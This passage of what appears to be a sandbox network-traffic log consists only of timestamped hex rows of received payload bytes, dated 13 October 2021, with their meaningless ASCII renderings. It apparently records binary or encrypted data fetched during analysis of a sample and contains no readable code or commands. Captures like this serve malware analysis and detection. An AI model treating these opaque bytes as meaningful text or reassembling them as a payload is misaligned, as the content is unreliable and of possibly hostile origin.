99 9c 49 55 8f 59 c5 dd 36 5d f3 75 0a a4 2b 6c 0a a4 46 b2 85 74 2a 56 c6 45 ff 82
                                                Data Ascii: Qu8FOeSFy#>>7~k)LSw|2"PV}nh|"ezTC?QyI>UG}/#TDm)&$o|7*Gs mNJYk,]ppr<Ki4oxQ`b%UH>IUY6]u+lFt*VE
                                                2021-10-13 18:35:47 UTC213INData Raw: d0 68 5f 32 3b 2f 50 19 55 99 63 d4 2a 0f d5 94 42 71 48 b0 b4 58 56 0a b3 64 eb 11 ea 2d 2c e4 09 b9 26 9b 72 bd 1d 8e d9 85 f6 18 10 73 6f ef 60 ed 1f 44 43 4b 23 bc 43 64 6c 32 d1 6b 79 6d 85 51 73 93 3f 76 18 6b 78 78 2d 39 04 25 77 1e a8 90 7f 5f 3c 9e 81 5a 5c 3a 91 0a a9 b9 93 69 d1 f5 7f 9c 1c a8 96 70 5b 3f 04 06 46 da 2d 39 96 b3 35 b4 d6 27 8f 5d a4 91 51 fe 45 0e f9 56 5c 86 da f4 02 27 29 7b 6a 5d b3 67 f4 94 ea 11 9c 4f bf f1 d0 8a 04 1b 5e da 17 fc 95 0a a9 cc 3e 94 a6 91 4e fb 04 44 99 ef 23 8d 59 da 4d 0d 7f 0c 93 38 98 19 2c bf 34 8b 16 20 e9 99 e2 07 53 c4 49 8e d2 27 4f 7b 6f 97 2f 7d f9 56 7e 1d f1 2c 9c 62 67 2b 65 f8 66 af 1b a0 f0 b0 87 b7 3f 0b a9 1d 79 9d a8 e0 e7 80 09 4e 39 ea 76 41 cc cd 3a ba ea a6 20 7b d6 25 bb 91 74 f2 5d
                                                Data Ascii: h_2;/PUc*BqHXVd-,&rso`DCK#Cdl2kymQs?vkxx-9%w_<Z\:ip[?F-95']QEV\'){j]gO^>ND#YM8,4 SI'O{o/}V~,bg+ef?yN9vA: {%t]
                                                2021-10-13 18:35:47 UTC216INData Raw: dc c0 98 e7 ab 6f 94 cb 0a 67 f1 ec c0 81 be 44 e5 a4 b8 fe 8d 47 a4 64 a6 80 36 d4 02 23 bc 36 85 ee 3a 5b e3 be fa 06 7c 6e 07 b8 fe 92 d4 a1 ef 80 32 fb 25 51 fe 58 3a cf 65 57 1c c8 7e 6f 80 1c 79 c9 a4 05 d4 c0 53 cf b5 32 c2 b9 b9 a5 8d 1f 8f 45 31 21 43 16 dd f7 22 45 1c 09 9e 81 e5 ad 18 81 c4 3b 83 75 55 cb f1 0e 34 bc f6 ba 22 7a 0d 6e 0c 24 83 49 1a 2c 96 83 a0 ef 97 6b 99 cf 23 29 38 8d 7a c1 a7 62 e9 c0 87 5d fc a2 a6 b4 51 b3 da b7 59 1c de 00 54 64 c6 10 1e e6 b1 65 26 e7 b0 ea 04 2f c7 86 ec 9b 66 a9 1c dd c7 b4 90 0e 58 63 50 4d e3 be 4c f2 9f 2d 9a 9b 27 fa d2 a3 16 2f 3d 57 f6 32 86 80 98 6d 40 9e 82 63 a3 30 44 c9 bd 51 55 18 2b 77 11 6c 72 59 bd f8 62 1c 86 52 d5 44 a9 1d 16 42 8e 30 94 a0 2d a3 d0 72 18 79 ca 59 69 3e 35 07 8e d3 2d
                                                Data Ascii: ogDGd6#6:[|n2%QX:eW~oyS2E1!C"E;uU4"zn$I,k#)8zb]QYTde&/fXcPML-'/=W2m@c0DQU+wlrYbRDB0-ryYi>5-
                                                2021-10-13 18:35:47 UTC221INData Raw: 7f 3d 2e e0 38 92 ce 57 7a cc 72 16 2c 02 21 76 c2 3e aa 7d 01 92 03 48 ba 71 28 d3 9b 4d da 7b a6 b0 41 9f 14 19 f9 58 60 5a 5c b6 83 73 57 1b 8c fe 01 19 ff 03 8a 63 83 51 e2 67 85 14 32 d0 98 0a 26 e0 39 15 8e f2 53 b1 2c f4 db 78 06 34 67 9d 79 1a 29 77 11 6b 9a d5 3a a5 00 27 d1 9a f8 fa 6d 97 5d c9 ef 81 99 40 52 77 4d b5 68 be cf c2 bc d1 19 28 f5 bc 3d 02 27 27 1e 96 f8 ec dc 9b 4c a9 1c d1 cb c3 4e 5b ec 29 66 c9 ca 4a 50 3d 26 51 7a 33 be 9a ec 05 2a db 97 58 e5 d1 f9 69 6d 35 1b 6f 75 99 44 91 7b 70 29 53 01 5c af 1e 25 f6 67 9b 66 97 1e d4 2b 2b 0a 42 b0 84 27 e0 03 90 f5 4a 85 75 02 de 0d b0 b6 54 6b a9 fe 95 68 ba a6 91 df 59 ce 59 3d 2a e4 07 7f dd 97 4b d6 0c 06 3a 93 bf fa f9 96 1b 9a ff 45 0f f6 e4 93 c6 de 66 66 c6 10 32 dd d8 63 aa 80
                                                Data Ascii: =.8Wzr,!v>}Hq(M{AX`Z\sWcQg2&9S,x4gy)wk:'m]@RwMh(=''LN[)fJP=&Qz3*Xim5ouD{p)S\%gf++B'JuTkhYY=*K:Eff2c
                                                2021-10-13 18:35:47 UTC225INData Raw: 17 23 0a 11 a9 1c 77 70 13 5c ba 14 3b f7 2b 04 61 ec 7c a5 28 8c 17 90 5a f2 e6 e1 4c ce 15 88 e4 90 78 19 9a f6 ac 40 be 5b 25 6c 24 62 91 81 c0 45 97 ca 76 17 88 6b 32 e4 2a fe 0f 6e 08 a9 d8 47 27 87 9c b8 71 53 aa 5f d8 d8 39 e6 87 a0 1b 11 af 3c 9f 42 aa 96 f4 c4 b8 fa 35 1f 59 cf ab 3a a1 c5 3b fd 71 8f 57 d9 1e da 04 13 ad 94 04 18 71 8f 72 fc 56 e5 ac af 3d 2f dd c3 c4 54 4e a0 fd d7 b0 33 9d d1 e6 26 4e af 21 0f bf e7 52 74 ae 8e 4e 67 f6 d5 9b c6 08 b6 97 e3 88 c3 db 8d e5 19 a7 2f ce cb 0d b1 27 63 b5 2d 45 80 86 c7 e7 a8 74 fe f9 eb 5e 8c cc 70 07 a2 ae 3d eb b1 2f 6b 63 29 01 6f 70 28 2a 3e a8 20 77 0b 31 69 ad d4 0d ac a2 88 2e 9f 71 74 60 6a b8 34 93 dc 75 94 0b 4d 97 ad 41 2d 7c 3a 95 6d 34 e0 bd 70 61 f0 28 9b 7e 88 f9 56 bd a6 8b 2e 2d
                                                Data Ascii: #wp\;+a|(ZLx@[%l$bEvk2*nG'qS_9<B5Y:;qWqrV=/TN3&N!RtNg/'c-Et^p=/kc)op(*> w1i.qt`j4uMA-|:m4pa(~V.-
                                                2021-10-13 18:35:47 UTC229INData Raw: c0 4e 98 f8 d4 09 9f 4f c0 7c 16 4c 7f 88 f6 19 a5 97 32 fc e9 a0 9c 4d 1b 44 88 e1 42 af 12 0a 83 7d b5 20 db 7d 67 f2 29 ae fa cb 80 54 0e 21 12 af 1a e8 1e e9 63 c1 ed c2 56 54 57 c9 df a1 d2 0b 74 26 c5 1b 93 4e a2 16 06 f7 0a 17 59 d2 21 24 61 da 00 e1 7c 6e 7a c4 e4 30 93 a6 2f 9d 61 ce 1e cf b5 2f 97 18 18 81 c4 31 61 b1 8a ca a2 32 2a a7 13 9e ee d4 4a a7 6f bc af 44 40 99 27 cb f6 19 ac 1a c6 10 e5 f9 49 4d e7 82 07 52 66 1d 9c 19 83 43 19 ff a7 db 82 37 0b a3 40 96 cb dd f7 9a d0 40 47 8b 65 f3 aa 73 93 5c 55 f1 dc c3 d8 0d b8 a4 4a bb 70 d8 4e 53 b6 5d 32 f2 b7 a4 c7 4c 83 62 48 80 f7 6e 20 2f 7e 34 80 21 6d ab f5 5e eb 00 03 a7 b8 de 3e 28 be 42 a5 22 82 11 12 00 1a 75 0c 69 aa 24 a2 96 00 df c1 ef 7b ca c1 64 07 8c 89 55 a9 ad 4b 10 39 5d f9
                                                Data Ascii: NO|L2MDB} }g)T!cVTWt&NY!$a|nz0/a/1a2*JoD@'IMRfC7@@Ges\UJpNS]2LbHn /~4!m^>(B"ui${dUK9]
                                                2021-10-13 18:35:47 UTC233INData Raw: f3 75 33 58 40 d7 25 57 92 99 95 65 f9 76 17 de 79 a4 52 3f cc aa 75 59 5c 91 6f 9c ce 9e 48 e0 f0 0c d7 36 51 46 da f8 09 50 13 2a 6f 0e 31 2b af 27 11 83 47 ac 63 32 f6 42 cc ee 22 bb ad 25 5d 04 07 70 52 56 8b f4 d6 ea 8e f6 80 3f 18 ce 7c 42 7c 81 3d 4a e2 d4 bf bb 91 71 1e dc fb a6 9e 66 46 d4 c4 1b f7 23 69 fb 65 c9 66 72 67 ee 97 ba bd 8a 36 ca 76 78 15 68 0f a9 54 57 d4 17 c0 bd dc 57 e4 27 4d 2c 7a f2 45 cc 7f d9 d2 0c 79 1e 3a 4b 2c 19 55 a8 a3 1d 40 e5 91 75 45 23 87 cc 18 2d 5f 0b a5 92 0a 05 ac ba 5f 33 be 47 ac 48 b6 7c d1 98 e8 fd 6c 84 a3 c0 ff 58 e3 c1 c5 5e 03 93 24 e0 ef d3 96 5e 55 72 df 8c 6a 59 65 92 3b 5d 04 27 be b2 5a 50 07 87 2e 8c 22 14 f4 a2 c1 98 a1 da ce 58 a6 5a 47 8e c2 bf 7b d4 0a 6f 11 7b 48 03 b6 0d 8c 22 33 90 bb b0 c1
                                                Data Ascii: u3X@%WevyR?uY\oH6QFP*o1+'Gc2B"%]pRV?|B|=JqfF#iefrg6vxhTWW'M,zEy:K,U@uE#-__3GH|lX^$^UrjYe;]'ZP."XZG{o{H"3
                                                2021-10-13 18:35:47 UTC236INData Raw: 65 7d bf 72 62 03 3b af 31 6c 51 ca 75 e6 75 02 e4 23 8f 2f ff 6f 87 d4 a7 f6 ce ad 51 28 ad 8a 10 18 4f da 02 a8 2f 37 34 54 55 45 36 9d 4f 14 74 17 fa 0f bf 52 6c 4a a8 9c 2a c8 be e6 bd d1 ca d1 fa 70 16 74 b1 e1 d2 96 e4 80 a4 00 6f c2 55 d6 33 d6 fa 19 4b d8 7e 5f 03 86 96 98 ce 37 14 9a ec 01 32 f9 5e 20 69 ed 77 2c db b5 3e 95 59 39 96 5c 36 38 a2 9e 25 e2 ba 11 3b c6 7f bc 37 cc 13 e9 77 a7 33 ba 57 0e 3c 79 d5 f9 6c 94 50 17 8b 44 ba fc 24 c9 0c 03 1e da 0b 17 95 31 43 01 f9 57 de cd 5a b0 42 10 19 92 5f aa f5 ef 43 fe d5 52 6a 62 10 e9 48 62 77 4d df ee a9 ac be 58 43 c5 b2 0c 3f cd b4 b1 87 6d d0 da 7d 4d 7c 7b a3 d9 9a 51 7a 71 d2 c4 87 45 3c 10 80 25 92 3f 58 58 52 a3 52 2e 47 20 fb a5 36 fd 56 87 20 43 16 96 0b 63 c7 2b 6e 16 94 b5 14 32 16
                                                Data Ascii: e}rb;1lQuu#/oQ(O/74TUE6OtRlJ*ptoU3K~_72^ iw,>Y9\68%;7w3W<ylPD$1CWZB_CRjbHbwMXC?m}M|{QzqE<%?XXRR.G 6V Cc+n2
                                                2021-10-13 18:35:47 UTC240INData Raw: 2b 73 90 e4 c6 8d b2 57 35 be f3 fb d6 c6 17 a1 93 53 d5 b2 43 c6 ec f2 c4 a1 16 9e 0c 0c da 05 32 a6 ed 1a cf 98 f1 f4 af 9e eb 6f c4 4b 1a fa 86 90 d8 04 07 a7 b9 81 9a 3e 46 b9 85 0f 65 18 8d b8 75 ce 13 14 0c 92 b9 e0 34 13 58 7a 12 35 a7 83 7a b6 46 f0 5b 35 b0 22 10 23 88 3d 93 94 68 eb 9e 22 d4 1b c2 17 07 a0 91 a3 63 f1 9f ca 4e ca 04 26 a9 02 be a8 80 1f 6e 08 47 3c 56 0d cd e4 95 af 30 6a a0 83 ab 64 ff 6b 07 fc 96 3b 89 43 d6 04 09 ef 58 25 fe 3c 1b 65 a1 29 b3 66 71 b1 38 b7 22 89 ae f2 00 28 88 42 87 24 c0 a1 e2 65 da 13 8d 43 7f e9 a7 24 49 fa b6 f8 ad 1e 22 1e c6 ac 0c 1a 5f 4a fa 7b 14 dd 47 47 8c 04 2b 71 91 ab 82 4e 65 b7 3d fe f3 04 8b 60 1c 98 5e 38 e3 d2 db 0b 1d 18 13 d7 95 6c f8 43 0d 6d e0 f4 d0 0c 33 88 3d 0d 2c 7d be 0a d2 f1 d7
                                                Data Ascii: +sW5SC2oK>Feu4Xz5zF[5"#=h"cN&nG<V0jdk;CX%<e)fq8"(B$eC$I"_J{GG+qNe=`^8lCm3=,}
                                                2021-10-13 18:35:47 UTC244INData Raw: 2e 85 ec f3 76 b1 45 bf b2 53 49 50 23 d7 dc f6 7b d8 4d dd aa 41 c7 92 31 3b f5 c8 4d b6 a6 c9 aa 53 a5 93 63 5f 8e 1a 48 f6 cb 2b 6b 90 62 19 aa ce f8 14 39 2c 1f 21 40 71 dc 35 0c fa a1 f9 83 bd a0 bc e8 23 9f af 8e 97 d1 a8 f2 a0 fe e7 de 94 50 06 19 93 4a 96 21 d3 7e 52 f6 72 6a 61 c5 f2 14 56 76 ec 31 79 f5 d6 33 e5 c0 f2 e2 4a 28 47 a2 a0 fc 2a 30 a4 78 80 a9 17 09 ce ac 85 87 04 6d 4e 8d 81 c5 28 d6 a8 32 aa 0f 04 04 ce 1e d8 48 1c c2 fc e4 50 cf 52 25 ac ae c8 35 22 11 bc f2 96 ae 33 34 f1 6f 13 0e 0e 5f 0a 04 23 a2 1b 61 c7 b6 12 f9 c9 9c 5e 0c 63 30 f2 c8 81 3d be 97 a7 94 c0 fa 68 9c f5 25 c5 2f aa 79 e4 b8 a5 19 a1 16 51 be fb 24 3e 90 24 17 91 f6 6d 36 12 32 65 14 e2 4e 99 f4 e5 41 69 84 b8 80 96 d9 ef 12 c9 54 4b 4f 0b 23 a7 a0 f0 39 2e 11
                                                Data Ascii: .vESIP#{MA1;MSc_H+kb9,!@q5#PJ!~RrjaVv1y3J(G*0xmN(2HPR%5"34o_#a^c0=h%/yQ$>$m62eNAiTKO#9.
                                                2021-10-13 18:35:47 UTC248INData Raw: 6d 5c 16 11 f4 24 7b 0f 69 1d f3 0a bc bb c7 a3 70 c9 22 aa 47 3c 71 bd ac 67 a2 28 95 80 3d 93 17 6d 7c 8c 86 57 9f 9e 3b cf c7 a3 a0 0b 21 cd 4b 1f 25 ce 2b bb d1 47 d0 c8 f0 5d 94 6e b2 ee ff 38 2f d3 26 37 ec c1 2f 24 33 26 30 e4 88 ad 64 a4 0a de 9c 0c 5d 51 f5 b3 cf 95 3a e0 5d 9c 7c f6 d3 24 c7 5c 28 7b ef 15 4d 9a f9 67 f6 57 3f 2e a3 fa cd 78 12 80 f2 9b af cc 87 3a 8d 55 61 9e 0b 10 2c e6 2a b0 3f 7c 9c 03 a1 3d 40 bd a6 ea 5d 66 d4 56 98 13 c8 a2 c3 2d 98 3f f5 e5 07 0d b2 9b e5 60 25 93 1f 8b f1 4e 3c 15 2a 4c 9b b1 7e d6 99 58 83 25 3a 22 eb 67 9c 07 00 a1 55 05 80 53 b5 6f e6 15 d3 2e d0 03 0c 9e 84 a1 b6 3f 31 1c b7 db 96 b4 48 36 2b 57 c7 1d 18 9e db 91 03 fe 85 37 33 8a 58 d1 28 71 f6 1d 76 14 9c 2d d7 92 d4 0a 07 27 26 fe c7 7c c9 c7 13
                                                Data Ascii: m\${ip"G<qg(=m|W;!K%+G]n8/&7/$3&0d]Q:]|$\({MgW?.x:Ua,*?|=@]fV-?`%N<*L~X%:"gUSo.?1H6+W73X(qv-'&|
                                                2021-10-13 18:35:47 UTC252INData Raw: 8b 7a b8 a6 87 0d 02 94 80 52 25 14 75 68 70 a9 ad ac 2e 39 01 02 8c ef bc b2 8a 32 08 5a 70 0c 02 56 b0 dc a6 2c 48 13 5a 91 c4 7f 60 14 65 18 83 a0 7d e8 5d df 75 df 48 5f e8 28 60 bc b2 75 ae 8a 41 db 9b e9 da 6b 31 c5 0f 55 2f 54 05 ae b5 8a b3 e5 aa da fb 2b 26 76 85 5a 27 a9 6d 88 e9 3e f0 3b e8 b5 7f 2f 68 ae cf 73 80 67 45 69 c1 c1 bb 56 cf 96 d8 5a 80 35 ce 27 72 e0 7c 4b 05 82 f6 54 af 72 42 c9 a9 df 88 00 00 7d d3 0e c5 e7 ae 12 5a ba 03 2a c9 10 26 ae 16 c5 76 67 73 34 2a 25 55 85 c5 78 85 9e 2a c8 b0 5e bd 19 aa 1f 66 d6 4f bf ee 14 46 9f a6 d3 50 a5 ea 77 58 bf 46 4a 7b 45 bb 5a 86 15 1c 4d cb 40 03 70 ab dc a1 91 4f b4 14 d0 32 1e 94 ae 28 6e bc b5 7f 14 6a 0b 64 b9 34 fc 26 57 aa 91 50 4f 3c e2 b1 44 9b fe e5 3e 97 5b 58 a8 91 54 2b ca a6
                                                Data Ascii: zR%uhp.92ZpV,HZ`e}]uH_(`uAk1U/T+&vZ'm>;/hsgEiVZ5'r|KTrB}Z*&vgs4*%Ux*^fOFPwXFJ{EZM@pO2(njd4&WPO<D>[XT+
                                                2021-10-13 18:35:47 UTC256INData Raw: 54 24 ed 23 96 11 53 77 1b f4 9a 2a 29 7a fa ca 1b 33 a8 72 9c ae 9d f1 b8 83 40 bf d9 c7 86 ab 0a 2c b6 2f bc ee d5 d4 da b8 a0 5b 7a b7 73 f8 8e ee 9a 77 ec 3e cc 51 b4 c8 ff 94 eb 98 ab e5 53 2a 25 4b 5f 6b 18 c9 95 57 e1 b5 02 dd de bc cd 0a 0a e1 23 30 a3 9a 68 e1 b6 20 7d 81 2b 2a 3d 23 f4 2f da 51 40 ea e7 51 84 8e a6 3e e8 0c 55 56 ba 25 80 96 c9 5b 91 86 2e 51 d3 10 7c cb 24 41 1b 6a 49 ec f5 91 2f 76 fd d4 53 57 a9 23 a4 84 39 f3 01 89 d5 6d 90 7a 0e 65 f0 ff 7f 5f 14 57 e3 a8 e4 17 84 76 ed 0d a4 c1 9a 09 86 22 ab 37 1b f9 1d 45 13 a4 42 53 d6 57 8c 31 dc 68 1a 92 9b b7 00 5b 51 1f 2b 43 05 79 a5 be ea 56 02 af 8e 88 09 44 bc 65 19 e3 5d 9b 4a 3a 8e a2 67 7a d8 d8 87 e4 5e 74 34 0a be 3a 43 e6 09 69 03 aa f2 63 52 d4 85 e5 ae 45 23 94 cd a6 90
                                                Data Ascii: T$#Sw*)z3r@,/[zsw>QS*%K_kW#0h }+*=#/Q@Q>UV%[.Q|$AjI/vSW#9mze_Wv"7EBSW1h[Q+CyVDe]J:gz^t4:CicRE#
                                                2021-10-13 18:35:47 UTC260INData Raw: 50 b9 46 84 66 d7 6f 9e 6d 5c 8f ae 75 7a 4d 05 10 0c 54 62 75 d9 0c 2b c7 3a d3 25 30 a0 4b bb a2 e5 76 a6 bd 12 c1 25 ae 40 48 ad ba 34 fa 74 83 ae 47 c4 b4 3e 68 39 c6 a2 d8 99 2a 5a 79 43 82 41 d2 11 f9 d3 78 83 47 15 78 f0 70 ab aa 59 a3 e6 b6 07 7e d9 dd 19 a8 90 e5 65 e1 64 54 e9 20 cb fe 30 2a 77 c9 c6 eb 07 73 c0 fa 48 1a 42 eb af 01 d9 72 ef a7 b7 bc b8 e7 d0 15 f1 46 8d e5 6d 64 7a 5c 9c b2 1b 38 f2 ef 2b df e3 a2 e4 fc e2 5f 94 6c 84 37 ba 3d fb 67 d5 f7 80 89 15 de 21 01 f5 f2 99 b8 bb 82 07 3d 2d 67 85 f9 92 96 93 c0 30 53 f1 ca 88 1f 11 b9 50 6a 54 f5 d9 30 23 bc ee 7a c3 a4 61 d8 d4 64 d7 0e fa f6 63 d0 b0 90 ff 1f 16 27 91 80 fa f4 8c 97 bb 47 33 54 ca f7 d2 e1 9b e6 3e 88 5d 2e 7c 8f 60 be dd 8b bd 0b 48 ba 3e 79 c2 c4 a7 53 02 eb c2 58
                                                Data Ascii: PFfom\uzMTbu+:%0Kv%@H4tG>h9*ZyCAxGxpY~edT 0*wsHBrFmdz\8+_l7=g!=-g0SPjT0#zadc'G3T>].|`H>ySX
                                                2021-10-13 18:35:47 UTC264INData Raw: bb b2 69 3c 56 05 1e 10 ee da 68 fb e7 63 f7 6d ba 0f c4 86 63 5f dd 77 57 05 61 83 3a 07 a0 14 72 7c 16 88 2f 1f 79 4a bd 42 41 74 85 f6 49 ec 00 f2 29 e4 37 0d f9 dc b4 e5 f3 11 0f f5 cc b6 f0 cd 50 5b 61 84 4f d2 06 0e 3a 93 9f 3b 4b 23 8d 6c ef 68 46 f7 6a 3f bc ce 06 49 9b 48 a4 c0 9b c8 64 51 41 18 ca b6 d7 d8 92 7f 40 8c 48 a6 b7 52 0f 79 2f 80 53 7d 7e 4c 4e 2b 64 ca 44 cc 9b 1f 27 3f d7 89 a5 75 1c ae ab ec de 40 56 5b 64 77 40 9e 18 8f a6 54 f7 59 a6 51 f4 50 29 15 18 85 bd 7e 55 f2 82 eb ad 8f f5 58 9f 00 9c 16 8e 9c f8 95 d5 c4 d3 07 b9 39 2b dc e6 22 ea 75 bf a3 50 b5 ee e2 a0 22 4a 12 df aa 22 95 eb 3f 02 77 55 de ac 01 6c 3e a7 ed a5 74 44 33 24 ab e9 3f f1 61 15 16 94 ed b1 8a 0b 21 ae 91 44 47 40 10 01 97 33 a9 5b db b3 22 67 f2 36 5a 97
                                                Data Ascii: i<Vhcmc_wWa:r|/yJBAtI)7P[aO:;K#lhFj?IHdQA@HRy/S}~LN+dD'?u@V[dw@TYQP)~UX9+"uP"J"?wUl>tD3$?a!DG@3["g6Z
                                                2021-10-13 18:35:47 UTC268INData Raw: f9 25 59 01 dd e3 fd 48 59 2e 0f c7 e0 12 a7 00 79 da 6d 33 82 17 31 05 ad 0a 2a b9 ac 44 a1 9e 0b cb 96 69 71 ec 62 6e 6d 01 51 4e 8b 6c 19 fd b7 7a ca 1f 21 cf bf cc 6f 75 3d a8 5d bd 95 ae 3c 75 d0 4b 6a 55 9f 4d 3c 55 2c 9a 06 bd cf 7b 62 31 93 c9 d0 81 b9 06 93 18 fb 19 26 18 41 8f 13 07 3e f3 00 e4 3d 4e 02 55 66 87 69 73 a3 69 76 4b 4f b5 51 7f 78 d0 f7 21 b8 45 36 7d 9d 66 1f 0d df 3e c3 ca 44 09 5a d7 c4 4f 85 0e 8a b3 52 ff 25 dd 5c 56 0b f6 74 3f 8d bd e5 ea fb a7 26 6e 11 ac 1d 96 06 4c fc aa f6 80 4b af ee be 71 05 ed a8 51 a6 f8 09 ff 08 b0 2b 0d 7b 22 84 69 65 cd 9d a7 75 d9 d6 f2 5e 62 b5 13 c9 54 6a 74 27 f2 b3 5d 21 d6 65 88 a2 dc 77 e3 c6 a2 e7 1f 73 48 04 74 d8 83 2e 21 bb 4b 76 56 c7 98 70 d9 68 94 c6 cc b2 10 ef 18 16 1a 27 ec 3a 15
                                                Data Ascii: %YHY.ym31*DiqbnmQNlz!ou=]<uKjUM<U,{b1&A>=NUfisivKOQx!E6}f>DZOR%\Vt?&nLKqQ+{"ieu^bTjt']!ewsHt.!KvVph':
                                                2021-10-13 18:35:47 UTC272INData Raw: c5 e2 30 b9 dc 52 fc 20 04 11 44 88 69 34 f0 1f 5f d0 81 16 b4 2a b0 98 58 60 4c b3 06 4c 02 66 1c 9d 64 6e 4f 1a 07 8e 2b ae c9 b6 73 72 fe 35 f7 c6 26 db f7 e7 6f fa 47 5d 8f 69 a6 bc 95 c8 93 5e e6 24 5d f2 e2 97 5f 53 ed d7 4d 08 97 89 9c 15 54 bd 6f 9b 76 cd 10 13 90 29 a4 cc 74 ad a0 a2 c2 76 f2 d9 96 4b 70 5d cd 3f ad 46 02 bd ea 83 ee d4 7d cd a4 94 4c 51 d8 57 ea 27 21 56 37 af 1b 1a b7 14 0c c3 9e 69 82 48 42 a5 19 d7 93 52 a3 af e3 b9 3d ec f8 ec 25 ad 0f 59 f5 e9 12 ef a2 e8 2b 42 57 57 51 3e 5e 60 b2 5b 53 56 64 5e 76 2c 79 98 c7 62 2f fb 4e bd 9c 88 6c 86 f7 f6 e0 b8 2d b4 2e 4c c0 8a c4 bb 97 6b e6 e2 4b 98 4b 93 87 c8 25 05 4e 20 2c 9e 98 ef b0 00 df 5d 70 86 2e c9 59 39 2f 19 f9 de e2 c4 f2 ca fc b7 ec e5 f5 b2 61 38 c2 85 13 47 37 1c d3
                                                Data Ascii: 0R Di4_*X`LLfdnO+sr5&oG]i^$]_SMTov)tvKp]?F}LQW'!V7iHBR=%Y+BWWQ>^`[SVd^v,yb/Nl-.LkKK%N ,]p.Y9/a8G7
                                                2021-10-13 18:35:47 UTC276INData Raw: 3e 17 e4 71 2b 79 74 f4 ec 37 0d ec 53 09 77 50 0b 21 71 42 70 94 c4 3d 6b 63 16 3e 62 3a 69 d0 0a 81 d6 29 3f 17 1e 10 e3 9b 3b 36 d6 38 1c 54 ed f9 a2 91 e7 70 9b cc ab 30 f0 6c 8d 9e 4d 28 6d 21 4f c7 f4 8a 41 cc f8 6b 13 16 41 a5 8d 50 82 49 c3 f4 d8 00 a3 c9 91 4c fb b3 5b 20 4d 71 82 05 34 87 3b bb 9f ea e0 9b 12 eb cd c7 1a 30 69 55 0a 69 01 bd d7 a5 98 84 e5 e5 37 22 85 69 99 1d 07 d0 97 50 08 4e e2 69 00 bf fb 31 dd fa ef 02 b2 bc 06 bc 36 35 8a 88 9a 6f f7 6d 2c 14 8c 6b ea 84 2d 95 7b 2e ef 26 4f be ff 9d d5 25 84 e0 1d ba 68 e3 2a b8 7d fd ee dc 40 85 78 a4 29 55 54 48 c5 b7 6f 48 6f 0a 53 1a 37 0e 91 01 a7 53 fa 38 74 f4 b7 7a 6d 90 ab 51 f7 1c 86 38 46 4e fc 10 78 9f 88 33 e1 f2 4a d3 bd 0e 1a b9 c6 99 01 e3 16 7b 90 a1 91 59 b1 e8 7f e1 12
                                                Data Ascii: >q+yt7SwP!qBp=kc>b:i)?;68Tp0lM(m!OAkAPIL[ Mq4;0iUi7"iPNi165om,k-{.&O%h*}@x)UTHoHoS7S8tzmQ8FNx3J{Y
                                                2021-10-13 18:35:47 UTC280INData Raw: a6 29 9e ac d7 b2 cf aa cf 0e 49 bb fe f9 f7 37 06 54 f2 97 d5 af a6 29 40 5e a3 d0 fc a6 16 fd f7 1c a6 db 42 df 3f c6 c2 1d 1a 95 1d 45 7f c8 d3 61 7f 7a 14 4f 08 e7 72 72 94 12 b9 45 91 94 6f b4 28 43 61 e0 5a 33 80 11 d2 70 fe 92 b7 8f ea 0f b5 54 8a 29 46 d8 06 15 3f 67 a7 28 af c8 74 0e 30 a1 78 b4 52 6b b7 e0 4e 1e 12 8f 83 cf 9e ec 94 1e 9d 82 cb 4c 22 94 9a da 29 d4 0c 62 79 84 30 63 90 3b ad c5 c1 ea f5 64 0a 6d ed 6d 46 9e a4 47 50 d0 94 2f 27 0f 32 fb 1e 5b b3 3f ea 09 de e5 02 10 1a 45 3d 00 42 9d f9 dd 85 41 3b dc d6 73 de 71 a6 43 35 32 34 a1 a5 39 19 29 a7 bf 3a 31 8f 1e ea 86 98 4e e9 9e 0d 6a 33 dc ec 37 1e bd 71 3c 3f d0 b8 23 ea 56 fa 92 43 68 89 38 be d9 a6 53 5e bc ea cd c3 a2 cb bb 21 f3 e7 a5 e0 56 3d df 6a 38 be c7 98 44 8a cc a2
                                                Data Ascii: )I7T)@^B?EazOrrEo(CaZ3pT)F?g(t0xRkNL")by0c;dmmFGP/'2[?E=BA;sqC5249):1Nj37q<?#VCh8S^!V=j8D
                                                2021-10-13 18:35:47 UTC284INData Raw: 68 ea 38 06 94 86 43 3d eb cf 8c f2 b9 ac b3 ce 89 ef f6 56 60 b3 51 0d 03 ad 55 ca 2a 99 0a 40 58 22 ad 0a 96 eb da c7 5f 77 d3 61 02 19 a9 1b 7e 98 0f d1 7c 6e e1 c3 f1 22 c9 2e 0c bf f8 6d 36 65 0c 99 14 d2 7e eb 08 19 d1 72 e7 2e 34 47 43 0c 2b 8e 9f 11 d3 86 86 a9 fd 89 b1 78 88 cc 7a 20 22 38 f0 bb c5 5e c5 f5 bc 81 49 80 41 4b 52 d5 88 ef 47 3c 22 02 da 47 2c ea 6a 9f 55 01 bf 0a 44 96 01 4d 4e 3f e7 72 29 6b 05 5c a3 9d c5 24 97 d2 42 95 22 ea c8 62 ef a6 6b 60 f7 e6 ef 4a c7 32 e6 48 3f 59 06 b2 39 fe 13 30 d0 7e 37 61 68 5f b2 93 5b b3 39 3f 07 e4 60 3c 8b 9a 40 71 38 4c e3 a5 4d 79 5f 5f 19 5e 13 bd 32 42 2f d4 3a 4a ff 8e 23 80 a7 fc a0 4d f1 f2 ed 31 08 f3 7b 4a 02 6d dd 86 ee 9f ca ec bd bf b5 63 db 4b 75 c4 f3 80 58 ab 0e 7d 1c 3f 29 c9 40
                                                Data Ascii: h8C=V`QU*@X"_wa~|n".m6e~r.4GC+xz "8^IAKRG<"G,jUDMN?r)k\$B"bk`J2H?Y90~7ah_[9?`<@q8LMy__^2B/:J#M1{JmcKuX}?)@
                                                2021-10-13 18:35:47 UTC289INData Raw: 17 7d 52 8b e0 e0 8f 9d d1 3c 76 e1 06 d4 a0 46 0f 69 24 1c 7b 6d 29 a8 2e 34 2c 2f ff ab f6 15 1c 09 3e 5a f2 0c 8b 94 48 73 3c 56 b4 76 8f 9d d0 ba ec fd d2 bf 63 33 a5 d2 cc b0 1e 0d 24 1c 19 81 04 cf 12 f1 a9 dc b9 02 a5 d2 d6 c8 d3 41 92 25 fb a1 aa 5e df 5e c2 98 13 73 36 47 91 a2 25 9e 33 c0 f6 15 0c e2 9d bf 54 8f 88 0d 17 7d 1d 8b e6 ef f6 15 1d 8b b4 76 95 ac 0d 65 59 1b ef 84 71 55 73 5a e8 f4 30 39 aa 5e c2 98 47 f0 64 b6 1e 0d 15 78 9e 41 87 8a 7f 77 31 bb 1f 90 44 69 27 a3 b9 02 b8 80 96 2e 44 69 32 3e 2f b6 08 d9 6f 50 f2 0c 8d 99 